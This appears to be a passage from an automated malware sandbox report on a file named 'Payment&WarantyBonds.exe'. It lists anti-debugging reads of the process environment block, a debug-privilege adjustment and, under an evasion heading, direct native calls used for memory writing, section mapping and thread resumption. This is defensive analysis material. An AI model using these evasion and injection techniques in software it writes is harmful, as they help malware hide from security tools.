                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0183A5D0 mov eax, dword ptr fs:[00000030h]2_2_0183A5D0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018025E0 mov eax, dword ptr fs:[00000030h]2_2_018025E0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0182E5E7 mov eax, dword ptr fs:[00000030h]2_2_0182E5E7
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0182E5E7 mov eax, dword ptr fs:[00000030h]2_2_0182E5E7
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0182E5E7 mov eax, dword ptr fs:[00000030h]2_2_0182E5E7
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0182E5E7 mov eax, dword ptr fs:[00000030h]2_2_0182E5E7
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0182E5E7 mov eax, dword ptr fs:[00000030h]2_2_0182E5E7
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0182E5E7 mov eax, dword ptr fs:[00000030h]2_2_0182E5E7
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0182E5E7 mov eax, dword ptr fs:[00000030h]2_2_0182E5E7
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0182E5E7 mov eax, dword ptr fs:[00000030h]2_2_0182E5E7
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0183C5ED mov eax, dword ptr fs:[00000030h]2_2_0183C5ED
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0183C5ED mov eax, dword ptr fs:[00000030h]2_2_0183C5ED
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01896500 mov eax, dword ptr fs:[00000030h]2_2_01896500
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018D4500 mov eax, dword ptr fs:[00000030h]2_2_018D4500
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018D4500 mov eax, dword ptr fs:[00000030h]2_2_018D4500
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018D4500 mov eax, dword ptr fs:[00000030h]2_2_018D4500
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018D4500 mov eax, dword ptr fs:[00000030h]2_2_018D4500
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018D4500 mov eax, dword ptr fs:[00000030h]2_2_018D4500
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018D4500 mov eax, dword ptr fs:[00000030h]2_2_018D4500
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018D4500 mov eax, dword ptr fs:[00000030h]2_2_018D4500
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01810535 mov eax, dword ptr fs:[00000030h]2_2_01810535
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01810535 mov eax, dword ptr fs:[00000030h]2_2_01810535
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01810535 mov eax, dword ptr fs:[00000030h]2_2_01810535
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01810535 mov eax, dword ptr fs:[00000030h]2_2_01810535
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01810535 mov eax, dword ptr fs:[00000030h]2_2_01810535
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01810535 mov eax, dword ptr fs:[00000030h]2_2_01810535
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0182E53E mov eax, dword ptr fs:[00000030h]2_2_0182E53E
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0182E53E mov eax, dword ptr fs:[00000030h]2_2_0182E53E
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0182E53E mov eax, dword ptr fs:[00000030h]2_2_0182E53E
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0182E53E mov eax, dword ptr fs:[00000030h]2_2_0182E53E
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0182E53E mov eax, dword ptr fs:[00000030h]2_2_0182E53E
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01808550 mov eax, dword ptr fs:[00000030h]2_2_01808550
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01808550 mov eax, dword ptr fs:[00000030h]2_2_01808550
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0183656A mov eax, dword ptr fs:[00000030h]2_2_0183656A
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0183656A mov eax, dword ptr fs:[00000030h]2_2_0183656A
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0183656A mov eax, dword ptr fs:[00000030h]2_2_0183656A
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018BA49A mov eax, dword ptr fs:[00000030h]2_2_018BA49A
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_017F645D mov eax, dword ptr fs:[00000030h]2_2_017F645D
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018064AB mov eax, dword ptr fs:[00000030h]2_2_018064AB
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018344B0 mov ecx, dword ptr fs:[00000030h]2_2_018344B0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0188A4B0 mov eax, dword ptr fs:[00000030h]2_2_0188A4B0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_017FC427 mov eax, dword ptr fs:[00000030h]2_2_017FC427
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_017FE420 mov eax, dword ptr fs:[00000030h]2_2_017FE420
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_017FE420 mov eax, dword ptr fs:[00000030h]2_2_017FE420
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_017FE420 mov eax, dword ptr fs:[00000030h]2_2_017FE420
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018004E5 mov ecx, dword ptr fs:[00000030h]2_2_018004E5
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01838402 mov eax, dword ptr fs:[00000030h]2_2_01838402
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01838402 mov eax, dword ptr fs:[00000030h]2_2_01838402
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01838402 mov eax, dword ptr fs:[00000030h]2_2_01838402
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01886420 mov eax, dword ptr fs:[00000030h]2_2_01886420
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01886420 mov eax, dword ptr fs:[00000030h]2_2_01886420
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01886420 mov eax, dword ptr fs:[00000030h]2_2_01886420
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01886420 mov eax, dword ptr fs:[00000030h]2_2_01886420
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01886420 mov eax, dword ptr fs:[00000030h]2_2_01886420
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01886420 mov eax, dword ptr fs:[00000030h]2_2_01886420
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01886420 mov eax, dword ptr fs:[00000030h]2_2_01886420
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0183E443 mov eax, dword ptr fs:[00000030h]2_2_0183E443
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0183E443 mov eax, dword ptr fs:[00000030h]2_2_0183E443
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0183E443 mov eax, dword ptr fs:[00000030h]2_2_0183E443
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0183E443 mov eax, dword ptr fs:[00000030h]2_2_0183E443
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0183E443 mov eax, dword ptr fs:[00000030h]2_2_0183E443
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0183E443 mov eax, dword ptr fs:[00000030h]2_2_0183E443
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0183E443 mov eax, dword ptr fs:[00000030h]2_2_0183E443
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0183E443 mov eax, dword ptr fs:[00000030h]2_2_0183E443
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0182245A mov eax, dword ptr fs:[00000030h]2_2_0182245A
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018BA456 mov eax, dword ptr fs:[00000030h]2_2_018BA456
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0188C460 mov ecx, dword ptr fs:[00000030h]2_2_0188C460
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0182A470 mov eax, dword ptr fs:[00000030h]2_2_0182A470
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0182A470 mov eax, dword ptr fs:[00000030h]2_2_0182A470
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0182A470 mov eax, dword ptr fs:[00000030h]2_2_0182A470
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018A678E mov eax, dword ptr fs:[00000030h]2_2_018A678E
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018B47A0 mov eax, dword ptr fs:[00000030h]2_2_018B47A0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018007AF mov eax, dword ptr fs:[00000030h]2_2_018007AF
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0180C7C0 mov eax, dword ptr fs:[00000030h]2_2_0180C7C0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018807C3 mov eax, dword ptr fs:[00000030h]2_2_018807C3
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0188E7E1 mov eax, dword ptr fs:[00000030h]2_2_0188E7E1
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018227ED mov eax, dword ptr fs:[00000030h]2_2_018227ED
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018227ED mov eax, dword ptr fs:[00000030h]2_2_018227ED
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018227ED mov eax, dword ptr fs:[00000030h]2_2_018227ED
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018047FB mov eax, dword ptr fs:[00000030h]2_2_018047FB
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018047FB mov eax, dword ptr fs:[00000030h]2_2_018047FB
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0183C700 mov eax, dword ptr fs:[00000030h]2_2_0183C700
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01800710 mov eax, dword ptr fs:[00000030h]2_2_01800710
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01830710 mov eax, dword ptr fs:[00000030h]2_2_01830710
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0183C720 mov eax, dword ptr fs:[00000030h]2_2_0183C720
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0183C720 mov eax, dword ptr fs:[00000030h]2_2_0183C720
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0187C730 mov eax, dword ptr fs:[00000030h]2_2_0187C730
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0183273C mov eax, dword ptr fs:[00000030h]2_2_0183273C
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0183273C mov ecx, dword ptr fs:[00000030h]2_2_0183273C
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0183273C mov eax, dword ptr fs:[00000030h]2_2_0183273C
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0183674D mov esi, dword ptr fs:[00000030h]2_2_0183674D
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0183674D mov eax, dword ptr fs:[00000030h]2_2_0183674D
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0183674D mov eax, dword ptr fs:[00000030h]2_2_0183674D
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01800750 mov eax, dword ptr fs:[00000030h]2_2_01800750
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01842750 mov eax, dword ptr fs:[00000030h]2_2_01842750
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01842750 mov eax, dword ptr fs:[00000030h]2_2_01842750
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0188E75D mov eax, dword ptr fs:[00000030h]2_2_0188E75D
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01884755 mov eax, dword ptr fs:[00000030h]2_2_01884755
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01808770 mov eax, dword ptr fs:[00000030h]2_2_01808770
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01810770 mov eax, dword ptr fs:[00000030h]2_2_01810770
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01810770 mov eax, dword ptr fs:[00000030h]2_2_01810770
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01810770 mov eax, dword ptr fs:[00000030h]2_2_01810770
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01810770 mov eax, dword ptr fs:[00000030h]2_2_01810770
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01810770 mov eax, dword ptr fs:[00000030h]2_2_01810770
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01810770 mov eax, dword ptr fs:[00000030h]2_2_01810770
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01810770 mov eax, dword ptr fs:[00000030h]2_2_01810770
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01810770 mov eax, dword ptr fs:[00000030h]2_2_01810770
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01810770 mov eax, dword ptr fs:[00000030h]2_2_01810770
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01810770 mov eax, dword ptr fs:[00000030h]2_2_01810770
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01810770 mov eax, dword ptr fs:[00000030h]2_2_01810770
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01810770 mov eax, dword ptr fs:[00000030h]2_2_01810770
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01804690 mov eax, dword ptr fs:[00000030h]2_2_01804690
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01804690 mov eax, dword ptr fs:[00000030h]2_2_01804690
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0183C6A6 mov eax, dword ptr fs:[00000030h]2_2_0183C6A6
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018366B0 mov eax, dword ptr fs:[00000030h]2_2_018366B0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0183A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0183A6C7
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0183A6C7 mov eax, dword ptr fs:[00000030h]2_2_0183A6C7
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0187E6F2 mov eax, dword ptr fs:[00000030h]2_2_0187E6F2
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0187E6F2 mov eax, dword ptr fs:[00000030h]2_2_0187E6F2
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0187E6F2 mov eax, dword ptr fs:[00000030h]2_2_0187E6F2
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0187E6F2 mov eax, dword ptr fs:[00000030h]2_2_0187E6F2
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018806F1 mov eax, dword ptr fs:[00000030h]2_2_018806F1
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018806F1 mov eax, dword ptr fs:[00000030h]2_2_018806F1
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0181260B mov eax, dword ptr fs:[00000030h]2_2_0181260B
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0181260B mov eax, dword ptr fs:[00000030h]2_2_0181260B
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0181260B mov eax, dword ptr fs:[00000030h]2_2_0181260B
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0181260B mov eax, dword ptr fs:[00000030h]2_2_0181260B
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0181260B mov eax, dword ptr fs:[00000030h]2_2_0181260B
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0181260B mov eax, dword ptr fs:[00000030h]2_2_0181260B
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0181260B mov eax, dword ptr fs:[00000030h]2_2_0181260B
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0187E609 mov eax, dword ptr fs:[00000030h]2_2_0187E609
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01842619 mov eax, dword ptr fs:[00000030h]2_2_01842619
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01836620 mov eax, dword ptr fs:[00000030h]2_2_01836620
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01838620 mov eax, dword ptr fs:[00000030h]2_2_01838620
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0181E627 mov eax, dword ptr fs:[00000030h]2_2_0181E627
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0180262C mov eax, dword ptr fs:[00000030h]2_2_0180262C
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0181C640 mov eax, dword ptr fs:[00000030h]2_2_0181C640
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018C866E mov eax, dword ptr fs:[00000030h]2_2_018C866E
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018C866E mov eax, dword ptr fs:[00000030h]2_2_018C866E
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0183A660 mov eax, dword ptr fs:[00000030h]2_2_0183A660
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0183A660 mov eax, dword ptr fs:[00000030h]2_2_0183A660
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01832674 mov eax, dword ptr fs:[00000030h]2_2_01832674
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018129A0 mov eax, dword ptr fs:[00000030h]2_2_018129A0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018129A0 mov eax, dword ptr fs:[00000030h]2_2_018129A0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018129A0 mov eax, dword ptr fs:[00000030h]2_2_018129A0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018129A0 mov eax, dword ptr fs:[00000030h]2_2_018129A0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018129A0 mov eax, dword ptr fs:[00000030h]2_2_018129A0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018129A0 mov eax, dword ptr fs:[00000030h]2_2_018129A0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018129A0 mov eax, dword ptr fs:[00000030h]2_2_018129A0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018129A0 mov eax, dword ptr fs:[00000030h]2_2_018129A0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018129A0 mov eax, dword ptr fs:[00000030h]2_2_018129A0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018129A0 mov eax, dword ptr fs:[00000030h]2_2_018129A0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018129A0 mov eax, dword ptr fs:[00000030h]2_2_018129A0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018129A0 mov eax, dword ptr fs:[00000030h]2_2_018129A0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Process token adjusted: Debug
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Memory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe NtWriteVirtualMemory: Direct from: 0x76F0490C
                Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe NtAllocateVirtualMemory: Direct from: 0x76F03C9C
                Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe NtClose: Direct from: 0x76F02B6C
                Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe NtReadVirtualMemory: Direct from: 0x76F02E8C
                Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe NtCreateKey: Direct from: 0x76F02C6C
                Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe NtSetInformationThread: Direct from: 0x76F02B4C
                Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe NtQueryAttributesFile: Direct from: 0x76F02E6C
                Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe NtAllocateVirtualMemory: Direct from: 0x76F048EC
                Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe NtQuerySystemInformation: Direct from: 0x76F048CC
                Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe NtQueryVolumeInformationFile: Direct from: 0x76F02F2C
                Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe NtOpenSection: Direct from: 0x76F02E0C
                Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe NtSetInformationThread: Direct from: 0x76EF63F9
                Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe NtDeviceIoControlFile: Direct from: 0x76F02AEC
                Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe NtAllocateVirtualMemory: Direct from: 0x76F02BEC
                Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe NtCreateFile: Direct from: 0x76F02FEC
                Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe NtOpenFile: Direct from: 0x76F02DCC
                Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe NtQueryInformationToken: Direct from: 0x76F02CAC
                Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe NtTerminateThread: Direct from: 0x76EF7B2E
                Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe NtTerminateThread: Direct from: 0x76F02FCC
                Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe NtOpenKeyEx: Direct from: 0x76F02B9C
                Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe NtProtectVirtualMemory: Direct from: 0x76F02F9C
                Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe NtSetInformationProcess: Direct from: 0x76F02C5C
                Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe NtNotifyChangeKey: Direct from: 0x76F03C2C
                Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe NtCreateMutant: Direct from: 0x76F035CC
                Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe NtWriteVirtualMemory: Direct from: 0x76F02E3C
                Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe NtMapViewOfSection: Direct from: 0x76F02D1C
                Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe NtResumeThread: Direct from: 0x76F036AC
                Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe NtAllocateVirtualMemory: Direct from: 0x76F02BFC
                Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe NtReadFile: Direct from: 0x76F02ADC
                Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe NtQuerySystemInformation: Direct from: 0x76F02DFC
                Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe NtDelayExecution: Direct from: 0x76F02DDC
